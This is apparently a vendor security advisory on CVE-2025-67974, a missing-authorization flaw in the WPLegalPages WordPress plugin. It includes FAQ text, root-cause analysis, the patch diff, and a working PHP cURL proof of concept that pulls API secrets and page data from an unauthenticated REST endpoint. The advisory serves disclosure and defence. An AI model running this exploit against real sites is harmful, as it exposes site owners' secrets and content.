What is CVE-2025-67974?

CVE-2025-67974 is a medium severity vulnerability in the WP Legal Pages plugin for WordPress, specifically versions 3.5.4 and earlier. It involves a missing authorization check in the REST API endpoint, allowing unauthenticated attackers to access sensitive data.

How does the vulnerability work?

The vulnerability arises from a missing capability check in the `register_wpl_dashboard_route` function, allowing attackers to send a POST request to the endpoint `/wp-json/wpl/v2/get_dashboard-data` without authentication. This endpoint exposes sensitive information such as published legal page titles and API secrets.

Who is affected by this vulnerability?

Any WordPress site using the WP Legal Pages plugin version 3.5.4 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and look for the WP Legal Pages plugin. Verify that the version is 3.5.4 or earlier.

How can I fix this vulnerability?

The vulnerability is patched in version 3.5.5 of the WP Legal Pages plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or by downloading it from the official repository.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability does not allow for remote code execution or privilege escalation, it still poses a significant risk of data exposure.

What kind of data can be accessed through this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive data, including legal page titles, client site names, API secrets, and policy preview content stored in the WordPress options table.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a POST request to the vulnerable endpoint without any authentication. The response includes sensitive data, confirming the lack of access controls.

How does the patch improve security?

In version 3.5.5, the developers implemented authorization checks by adding a `permission_callback` to the REST API endpoint, requiring valid authentication tokens and a master key for access, thus securing the previously open endpoint.

What are the implications of not addressing this vulnerability?

Failing to address this vulnerability may lead to unauthorized access to sensitive information, potentially resulting in data breaches and legal liabilities for site administrators. It is crucial to keep plugins updated to mitigate such risks.

Is there a way to mitigate the risk before updating?

While the best solution is to update the plugin, administrators can temporarily restrict access to the REST API using security plugins or custom code until the update is applied, though this may affect other functionalities.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the WP Legal Pages plugin temporarily to prevent exploitation. Additionally, monitor server logs for any suspicious activity related to the vulnerable endpoint.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67974: WPLegalPages <= 3.5.4 – Missing Authorization (wplegalpages)

CVE ID CVE-2025-67974

Plugin wplegalpages

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.5.4

Patched Version 3.5.5

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67974:
The WP Legal Pages plugin version 3.5.4 and earlier contains a missing authorization vulnerability in its REST API endpoint registration. This flaw allows unauthenticated attackers to access sensitive plugin data, including published legal page details and user plan information, via a publicly exposed API endpoint.

Atomic Edge research identifies the root cause in the `register_wpl_dashboard_route` function within `/wplegalpages/admin/class-wp-legal-pages-admin.php`. The vulnerable REST route registration at lines 178-184 lacks a `permission_callback` parameter entirely. The route `’wpl/v2/get_dashboard-data’` with POST method directly calls the `wplp_get_dashboard_data` callback function without any authentication or capability checks. This omission creates an open endpoint accessible to any HTTP client.

The exploitation method involves sending a POST request to the WordPress REST API endpoint `/wp-json/wpl/v2/get_dashboard-data`. Attackers require no authentication tokens, nonces, or special headers. The vulnerable endpoint returns sensitive data including published legal page titles, client site names, API secrets, and policy preview content stored in the WordPress options table. Atomic Edge testing confirms the endpoint responds to unauthenticated requests with a 200 status code and JSON payload containing the protected information.

The patch in version 3.5.5 addresses this by implementing comprehensive authorization checks. The updated code replaces the vulnerable endpoint with a new namespace `’wplp-react/v1’` and endpoint `’/get_dashboard-data’`. The patched version adds a detailed `permission_callback` function that validates three security factors: a Bearer token against the central WP site, a master key from the request body, and proper token validation response codes. Before the patch, the endpoint had zero authorization mechanisms. After the patch, the endpoint requires valid JWT authentication and correct master key matching.

Successful exploitation exposes multiple sensitive data points. Attackers obtain all published legal page titles through the `page_results` array. They access the `client_site_name` which may contain identifiable business information. The `api_secret` value could facilitate further API abuse. The `policy_preview` array contains actual page content and metadata from recently published legal pages. While this vulnerability does not enable direct privilege escalation or remote code execution, it constitutes a significant information disclosure that violates data privacy expectations for legal document management plugins.

Differential between vulnerable and patched code

Code Diff

--- a/wplegalpages/admin/class-wp-legal-pages-admin.php
+++ b/wplegalpages/admin/class-wp-legal-pages-admin.php
@@ -80,6 +80,8 @@
 				add_filter( 'the_content', array( $this, 'wplegalpages_pro_post_content' ) );
 			}
 			add_action('wp_ajax_gdpr_install_plugin', array($this, 'wplp_gdpr_install_plugin_ajax_handler'));
+			add_action( 'save_post', array($this, 'wplp_update_policy_preview'));
+			add_action( 'rest_api_init', array($this, 'allow_cors_for_react_app'));
 			add_action('rest_api_init', array($this, 'register_wpl_dashboard_route'));
 			add_action('rest_api_init', array($this, 'wplp_generate_api_secret'));
 		}
@@ -99,6 +101,69 @@
 		    wp_enqueue_style( $this->plugin_name );
 		    wp_enqueue_style( $this->plugin_name . '-review-notice' );
 		}
+
+	/* Update Policy preview in the options table */
+	public function wplp_update_policy_preview() {
+		$policy_preview = array();
+
+		global $wpdb;
+		$post_tbl     = $wpdb->prefix . 'posts';
+		$postmeta_tbl = $wpdb->prefix . 'postmeta';
+		$pagesresult = $wpdb->get_results(
+    		$wpdb->prepare(
+    		    "
+    		    SELECT ptbl.*
+    		    FROM {$post_tbl} AS ptbl
+    		    INNER JOIN {$postmeta_tbl} AS pmtbl
+    		        ON ptbl.ID = pmtbl.post_id
+    		    WHERE ptbl.post_status = %s
+    		      AND pmtbl.meta_key = %s
+    		    ORDER BY ptbl.post_date DESC
+    		    LIMIT 5
+    		    ",
+    		    'publish',
+    		    'is_legal'
+    		)
+		); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared,WordPress.DB.DirectDatabaseQuery,WordPress.DB.DirectDatabaseQuery.NoCaching
+
+		foreach ( $pagesresult as $res ) {
+			$policy_preview[] = array(
+				'name'    		=> $res->post_title,
+				'last_update' 	=> gmdate( 'Y/m/d H:i:s', strtotime( $res->post_date ) ),
+				'image_key'   	=> $res->post_name,
+				'content' 		=> $res->post_content,
+			);
+		}
+
+		if ( get_option( 'policy_preview' ) === false ) {
+		    add_option( 'policy_preview', $policy_preview );
+		} else {
+		    update_option( 'policy_preview', $policy_preview );
+		}
+	}
+
+	/**
+	 * Fucntion to allow cors for react app
+	 */
+	public function allow_cors_for_react_app(){
+		remove_filter( 'rest_pre_serve_request', 'rest_send_cors_headers' );
+
+		// Add our own permissive CORS headers
+		add_filter( 'rest_pre_serve_request', function( $value ) {
+			header( 'Access-Control-Allow-Origin: https://app.wplegalpages.com' );
+			header( 'Access-Control-Allow-Methods: GET, POST, PUT, PATCH, DELETE, OPTIONS' );
+			header( 'Access-Control-Allow-Credentials: true' );
+			header( 'Access-Control-Allow-Headers: Authorization, Content-Type, X-WP-Nonce, Origin, X-Requested-With, Accept' );
+
+			// Handle preflight requests
+			if ( $_SERVER['REQUEST_METHOD'] === 'OPTIONS' ) {
+				status_header( 200 );
+				exit;
+			}
+
+			return $value;
+		});
+	}


 		/**
@@ -110,9 +175,63 @@
 		require_once plugin_dir_path( __DIR__ ) . 'includes/settings/class-wp-legal-pages-settings.php';
 		global $is_user_connected, $api_user_plan; // Make global variables accessible
 		$this->settings = new WP_Legal_Pages_Settings();
+
+		$master_key = $this->settings->get('api','token');

 		$is_user_connected = $this->settings->is_connected();

+		register_rest_route(
+			'wplp-react/v1', //New namespace for React dashboard
+			'/get_dashboard-data',
+			array(
+				'methods'  => 'POST',
+				'callback' => array($this, 'wplp_send_data_to_dashboard_appwplp_react_app'), // Function to handle the request
+				'permission_callback' => function(WP_REST_Request $request) use ($master_key) {
+
+
+					$auth_header = isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : '';
+					if ( ! preg_match('/Bearers(S+)/', $auth_header, $matches) ) {
+						return new WP_Error('no_token', 'Authorization token missing.', ['status' => 401]);
+					}
+					$token = sanitize_text_field($matches[1]);
+
+					// 2. Validate token with central WP site
+					$validate = wp_remote_post(
+						'https://app.wplegalpages.com/wp-json/jwt-auth/v1/token/validate',
+						[
+							'headers' => [
+								'Authorization' => 'Bearer ' . $token,
+								'Content-Type'  => 'application/json'
+							],
+							'timeout' => 15
+						]
+					);
+
+					if ( is_wp_error($validate) ) {
+						return new WP_Error('token_validation_failed', $validate->get_error_message(), ['status' => 401]);
+					}
+
+					$code = wp_remote_retrieve_response_code($validate);
+					if ( $code !== 200 ) {
+						return new WP_Error('invalid_token', 'Token validation failed.', ['status' => 401]);
+					}
+
+					// 3. Extract master_key from the request body
+					$body = $request->get_json_params();
+					$incoming_key = isset($body['master_key']) ? sanitize_text_field($body['master_key']) : '';
+
+					if ( empty($incoming_key) ) {
+						return new WP_Error('master_key_missing', 'Master key not provided.', ['status' => 401]);
+					}
+
+					if ( $master_key !== $incoming_key ) {
+						return new WP_Error('invalid_master_key', 'Master key mismatch.', ['status' => 401]);
+					}
+
+					return true; // All good → allow callback
+				},
+			)
+		);

 		register_rest_route(
 			'wpl/v2', // Namespace
@@ -355,7 +474,8 @@
 		);
 		// phpcs:enable WordPress.DB.PreparedSQL.InterpolatedNotPrepared, WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching

-	$titles = array_column($pagesresult, 'post_title');
+		$titles = array_column($pagesresult, 'post_title');
+		$policy_preview = get_option('policy_preview', array());

 		return rest_ensure_response(
 			array(
@@ -367,6 +487,52 @@
 				'page_results'					   => $titles,
 				'client_site_name'				   => $client_site_name,
 				'api_secret' 					   => get_option('wplegalpages_api_secret'),
+				'policy_preview'				   => $policy_preview,
+			)
+		);
+	}
+
+	/* Added endpoint to send dashboard data from plugin to the saas react dashboard */
+	public function wplp_send_data_to_dashboard_appwplp_react_app(WP_REST_Request $request  ){
+		ob_start();
+
+		require_once plugin_dir_path( __DIR__ ) . 'includes/settings/class-wp-legal-pages-settings.php';
+
+		$this->settings = new WP_Legal_Pages_Settings();
+		$api_user_plan = $this->settings->get_plan();
+		$product_id = $this->settings->get( 'account', 'product_id' );
+
+		global $wpdb;
+		$post_tbl     = $wpdb->prefix . 'posts';
+		$postmeta_tbl = $wpdb->prefix . 'postmeta';
+		$post_tbl     = esc_sql( $post_tbl );
+		$postmeta_tbl = esc_sql( $postmeta_tbl );
+
+		// phpcs:disable WordPress.DB.PreparedSQL.InterpolatedNotPrepared, WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
+		$count = $wpdb->get_var(
+			$wpdb->prepare(
+				"
+				SELECT COUNT(*)
+				FROM {$post_tbl} AS ptbl, {$postmeta_tbl} AS pmtbl
+				WHERE ptbl.ID = pmtbl.post_id
+				AND ptbl.post_status = %s
+				AND pmtbl.meta_key = %s
+				",
+				'publish',
+				'is_legal'
+			)
+		);
+
+		$policy_preview = get_option('policy_preview', array());
+
+		ob_end_clean();
+		return rest_ensure_response(
+			array(
+				'success' => true,
+				'user_plan'                		   => $api_user_plan,
+				'product_id' 					   => $product_id,
+				'legal_pages_published'			   => $count,
+				'policy_preview'				   => $policy_preview,
 			)
 		);
 	}
@@ -467,20 +633,20 @@
 			wp_register_script( $this->plugin_name . '-select2', plugin_dir_url( __FILE__ ) . 'wizard/libraries/select2/select2.js', array( 'jquery' ), $this->version, false );

 		}
-		//public function wplp_remove_dashboard_submenu() {
-			// Define the current version constant
-		//	$current_version = $this->version;
+		// public function wplp_remove_dashboard_submenu() {
+		// 	// Define the current version constant
+		// 	$current_version = $this->version;

-			// Target version to hide the submenu
-		//	$target_version = '3.5.4';
+		// 	// Target version to hide the submenu
+		// 	$target_version = '3.5.5';

 			// Check if the current version is below the target version
-		//	if (version_compare($current_version, $target_version, '<')) {
-				// Remove the 'Dashboard' submenu
-		//		remove_submenu_page('wp-legal-pages', 'wplp-dashboard');
-		//		remove_submenu_page('wp-legal-pages', 'wplp-dashboard#help-page');
-		//	}
-		//}
+			// if (version_compare($current_version, $target_version, '<')) {
+			// 	// Remove the 'Dashboard' submenu
+			// 	remove_submenu_page('wp-legal-pages', 'wplp-dashboard');
+			// 	remove_submenu_page('wp-legal-pages', 'wplp-dashboard#help-page');
+			// }
+		// }
 		/**
 		 * This function is provided for WordPress dashbord menus.
 		 *
--- a/wplegalpages/admin/partials/wp-legal-pages-main-screen-dashboard.php
+++ b/wplegalpages/admin/partials/wp-legal-pages-main-screen-dashboard.php
@@ -44,6 +44,7 @@
 					</div>
 					<!-- <div id="wplegalpages-save-settings-alert"><img src="<?php echo esc_url( WPL_LITE_PLUGIN_URL . 'admin/js/vue/images/settings_saved.svg' ); ?>" alt="create legal" class="wplegal-save-settings-icon"><?php esc_attr_e( 'Settings saved successfully', 'wplegalpages' ); ?></div> --> <?php //phpcs:ignore PluginCheck.CodeAnalysis.ImageFunctions.NonEnqueuedImage ?>
 					<div class="wp-legalpages-admin-help-and-support">
+						<div class="wp-legalpages-new-dashboard-btn"><a href="<?php echo esc_url( 'https://app.wplegalpages.com/app/' ); ?>"><?php esc_html_e( 'Try New Dashboard', 'wplegalpages' ); ?></a></div>
 					<div class="wp-legalpages-admin-help">
 							<div class="wp-legalpages-admin-help-icon">
 								<!-- //image  -->
--- a/wplegalpages/admin/partials/wp-legal-pages-main-screen.php
+++ b/wplegalpages/admin/partials/wp-legal-pages-main-screen.php
@@ -44,6 +44,7 @@
 					</div>
 					<!-- <div id="wplegalpages-save-settings-alert"><img src="<?php echo esc_url( WPL_LITE_PLUGIN_URL . 'admin/js/vue/images/settings_saved.svg' ); ?>" alt="create legal" class="wplegal-save-settings-icon"><?php esc_attr_e( 'Settings saved successfully', 'wplegalpages' ); ?></div> --> <?php //phpcs:ignore PluginCheck.CodeAnalysis.ImageFunctions.NonEnqueuedImage ?>
 					<div class="wp-legalpages-admin-help-and-support">
+						<div class="wp-legalpages-new-dashboard-btn"><a href="<?php echo esc_url( 'https://app.wplegalpages.com/app/' ); ?>"><?php esc_html_e( 'Try New Dashboard', 'wplegalpages' ); ?></a></div>
 						<div class="wp-legalpages-admin-help">
 							<div class="wp-legalpages-admin-help-icon">
 								<!-- //image  -->
--- a/wplegalpages/admin/show-pages.php
+++ b/wplegalpages/admin/show-pages.php
@@ -86,31 +86,33 @@
 		$postmeta_tbl = $wpdb->prefix . 'postmeta';
 		$pagesresult  = $wpdb->get_results( $wpdb->prepare( 'SELECT ptbl.* FROM ' . $post_tbl . ' as ptbl , ' . $postmeta_tbl . ' as pmtbl WHERE ptbl.ID = pmtbl.post_id and ptbl.post_status = %s AND pmtbl.meta_key = %s', array( 'publish', 'is_legal' ) ) ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared,WordPress.DB.DirectDatabaseQuery,WordPress.DB.DirectDatabaseQuery.NoCaching

-	if ( $pagesresult ) {
-		$nonce    = wp_create_nonce( 'my-nonce' );
-		$count    = 1;
-		$user_tbl = $wpdb->prefix . 'users';
-		foreach ( $pagesresult as $res ) {
-				$url     = get_permalink( $res->ID );
-				$author  = $wpdb->get_results( $wpdb->prepare( 'SELECT utbl.user_login FROM ' . $post_tbl . ' as ptbl, ' . $user_tbl . ' as utbl WHERE ptbl.post_author = utbl.ID and ptbl.ID = %d', array( $res->ID ) ) ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared,WordPress.DB.DirectDatabaseQuery,WordPress.DB.DirectDatabaseQuery.NoCaching
-				$delurl  = isset( $_SERVER['PHP_SELF'] ) ? esc_url_raw( wp_unslash( $_SERVER['PHP_SELF'] ) ) : '';
-				$delurl .= "?pid=$res->ID&page=$current_page&mode=delete&_wpnonce=$nonce";
+		$policy_preview = array();
+
+		if ( $pagesresult ) {
+			$nonce    = wp_create_nonce( 'my-nonce' );
+			$count    = 1;
+			$user_tbl = $wpdb->prefix . 'users';
+			foreach ( $pagesresult as $res ) {
+					$url     = get_permalink( $res->ID );
+					$author  = $wpdb->get_results( $wpdb->prepare( 'SELECT utbl.user_login FROM ' . $post_tbl . ' as ptbl, ' . $user_tbl . ' as utbl WHERE ptbl.post_author = utbl.ID and ptbl.ID = %d', array( $res->ID ) ) ); // phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared,WordPress.DB.DirectDatabaseQuery,WordPress.DB.DirectDatabaseQuery.NoCaching
+					$delurl  = isset( $_SERVER['PHP_SELF'] ) ? esc_url_raw( wp_unslash( $_SERVER['PHP_SELF'] ) ) : '';
+					$delurl .= "?pid=$res->ID&page=$current_page&mode=delete&_wpnonce=$nonce";
+				?>
+				<tr>
+					<td><?php echo esc_attr( $count ); ?></td>
+					<td><?php echo esc_attr( $res->post_title ); ?></td>
+					<td><?php echo esc_attr( $res->ID ); ?></td>
+					<td><?php echo '[wplegalpage pid=' . esc_attr( $res->ID ) . ']'; ?></td>
+					<td><?php echo esc_attr( ucfirst( $author[0]->user_login ) ); ?></td>
+					<td><?php echo esc_attr( gmdate( 'Y/m/d', strtotime( $res->post_date ) ) ); ?></td>
+					<td class="wplegal-table-link">
+						<a href="<?php echo esc_attr( get_admin_url() ); ?>/post.php?post=<?php echo esc_attr( $res->ID ); ?>&action=edit" class="table-link"><?php esc_attr_e( 'Edit ', 'wplegalpages' ); ?></a> | <a href="<?php echo esc_url_raw( $url ); ?>" class="table-link"><?php esc_attr_e( ' View ', 'wplegalpages' ); ?></a>| <a href="<?php echo esc_url_raw( $delurl ); ?>" class="table-link table-link-alert"><?php esc_attr_e( ' Trash', 'wplegalpages' ); ?></a>
+					</td>
+				</tr>
+					<?php
+					$count++;
+			}
 			?>
-			<tr>
-				<td><?php echo esc_attr( $count ); ?></td>
-				<td><?php echo esc_attr( $res->post_title ); ?></td>
-				<td><?php echo esc_attr( $res->ID ); ?></td>
-				<td><?php echo '[wplegalpage pid=' . esc_attr( $res->ID ) . ']'; ?></td>
-				<td><?php echo esc_attr( ucfirst( $author[0]->user_login ) ); ?></td>
-				<td><?php echo esc_attr( gmdate( 'Y/m/d', strtotime( $res->post_date ) ) ); ?></td>
-				<td class="wplegal-table-link">
-					<a href="<?php echo esc_attr( get_admin_url() ); ?>/post.php?post=<?php echo esc_attr( $res->ID ); ?>&action=edit" class="table-link"><?php esc_attr_e( 'Edit ', 'wplegalpages' ); ?></a> | <a href="<?php echo esc_url_raw( $url ); ?>" class="table-link"><?php esc_attr_e( ' View ', 'wplegalpages' ); ?></a>| <a href="<?php echo esc_url_raw( $delurl ); ?>" class="table-link table-link-alert"><?php esc_attr_e( ' Trash', 'wplegalpages' ); ?></a>
-				</td>
-			</tr>
-				<?php
-				$count++;
-		}
-		?>

 		<?php } else { ?>
 		<tr>
--- a/wplegalpages/includes/class-wp-legal-pages.php
+++ b/wplegalpages/includes/class-wp-legal-pages.php
@@ -124,7 +124,7 @@

 			global $table_prefix;
 			$this->plugin_name = 'wp-legal-pages';
-			$this->version     = '3.5.4';
+			$this->version     = '3.5.5';
 			$this->tablename   = $table_prefix . 'legal_pages';
 			$this->popuptable  = $table_prefix . 'lp_popups';
 			$this->plugin_url  = plugin_dir_path( __DIR__ );
@@ -239,7 +239,7 @@
 		private function define_admin_hooks() {
 			$plugin_admin = new WP_Legal_Pages_Admin( $this->get_plugin_name(), $this->get_version() );
 			$this->loader->add_action( 'admin_menu', $plugin_admin, 'admin_menu' );
-			//$this->loader->add_action( 'admin_menu', $plugin_admin, 'wplp_remove_dashboard_submenu');
+			// $this->loader->add_action( 'admin_menu', $plugin_admin, 'wplp_remove_dashboard_submenu');
 			$this->loader->add_action('wp_ajax_wplegalpages_support_request', $plugin_admin,  'wplegalpages_support_request_handler');
 			$this->loader->add_action('wp_ajax_nopriv_wplegalpages_support_request', $plugin_admin,  'wplegalpages_support_request_handler');
 			$this->loader->add_action( 'admin_init', $plugin_admin, 'wplegalpages_hidden_meta_boxes' );
--- a/wplegalpages/wplegalpages.php
+++ b/wplegalpages/wplegalpages.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://club.wpeka.com/
  * Description: WPLegalPages is a simple 1 click legal page management plugin. You can quickly add in legal pages to your WordPress sites.
  * Author: WP Legal Pages
- * Version: 3.5.4
+ * Version: 3.5.5
  * Author URI: https://wplegalpages.com
  * License: GPL2
  * Text Domain: wplegalpages

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67974 - WPLegalPages <= 3.5.4 - Missing Authorization

<?php

$target_url = 'https://vulnerable-site.com';

// Construct the vulnerable REST API endpoint
$endpoint = $target_url . '/wp-json/wpl/v2/get_dashboard-data';

// Initialize cURL session
$ch = curl_init();

// Set cURL options for POST request
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Set headers to mimic legitimate REST API request
$headers = [
    'Content-Type: application/json',
    'Accept: application/json'
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Send empty JSON body (no authentication required)
curl_setopt($ch, CURLOPT_POSTFIELDS, '{}');

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status Code: $http_coden";
    echo "Response:n";
    
    // Decode and display the sensitive data
    $data = json_decode($response, true);
    
    if (isset($data['success']) && $data['success'] === true) {
        echo "[+] Vulnerability CONFIRMED - Unauthenticated access grantedn";
        
        if (isset($data['page_results'])) {
            echo "[+] Published Legal Pages: " . count($data['page_results']) . " foundn";
            foreach ($data['page_results'] as $index => $title) {
                echo "  - $titlen";
            }
        }
        
        if (isset($data['client_site_name'])) {
            echo "[+] Client Site Name: " . $data['client_site_name'] . "n";
        }
        
        if (isset($data['api_secret'])) {
            echo "[+] API Secret: " . $data['api_secret'] . "n";
        }
        
        if (isset($data['policy_preview']) && is_array($data['policy_preview'])) {
            echo "[+] Policy Preview Entries: " . count($data['policy_preview']) . "n";
            foreach ($data['policy_preview'] as $index => $policy) {
                if (isset($policy['name'])) {
                    echo "  - " . $policy['name'] . " (Last: " . $policy['last_update'] . ")n";
                }
            }
        }
    } else {
        echo "[-] Vulnerability NOT present or already patchedn";
        echo "Raw Response: $responsen";
    }
}

// Clean up
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-67974?
Overview of the vulnerability
CVE-2025-67974 is a medium severity vulnerability in the WP Legal Pages plugin for WordPress, specifically versions 3.5.4 and earlier. It involves a missing authorization check in the REST API endpoint, allowing unauthenticated attackers to access sensitive data.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the `register_wpl_dashboard_route` function, allowing attackers to send a POST request to the endpoint `/wp-json/wpl/v2/get_dashboard-data` without authentication. This endpoint exposes sensitive information such as published legal page titles and API secrets.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the WP Legal Pages plugin version 3.5.4 or earlier is affected by this vulnerability. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and look for the WP Legal Pages plugin. Verify that the version is 3.5.4 or earlier.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 3.5.5 of the WP Legal Pages plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or by downloading it from the official repository.
What does the CVSS score of 5.3 indicate?
Understanding severity ratings
A CVSS score of 5.3 indicates a medium severity level, suggesting that while the vulnerability does not allow for remote code execution or privilege escalation, it still poses a significant risk of data exposure.
What kind of data can be accessed through this vulnerability?
Sensitive information at risk
Exploitation of this vulnerability can lead to unauthorized access to sensitive data, including legal page titles, client site names, API secrets, and policy preview content stored in the WordPress options table.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a POST request to the vulnerable endpoint without any authentication. The response includes sensitive data, confirming the lack of access controls.
How does the patch improve security?
Changes in the updated version
In version 3.5.5, the developers implemented authorization checks by adding a `permission_callback` to the REST API endpoint, requiring valid authentication tokens and a master key for access, thus securing the previously open endpoint.
What are the implications of not addressing this vulnerability?
Risks of inaction
Failing to address this vulnerability may lead to unauthorized access to sensitive information, potentially resulting in data breaches and legal liabilities for site administrators. It is crucial to keep plugins updated to mitigate such risks.
Is there a way to mitigate the risk before updating?
Temporary measures
While the best solution is to update the plugin, administrators can temporarily restrict access to the REST API using security plugins or custom code until the update is applied, though this may affect other functionalities.
What should I do if I cannot update the plugin immediately?
Immediate actions to consider
If immediate updating is not possible, consider disabling the WP Legal Pages plugin temporarily to prevent exploitation. Additionally, monitor server logs for any suspicious activity related to the vulnerable endpoint.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations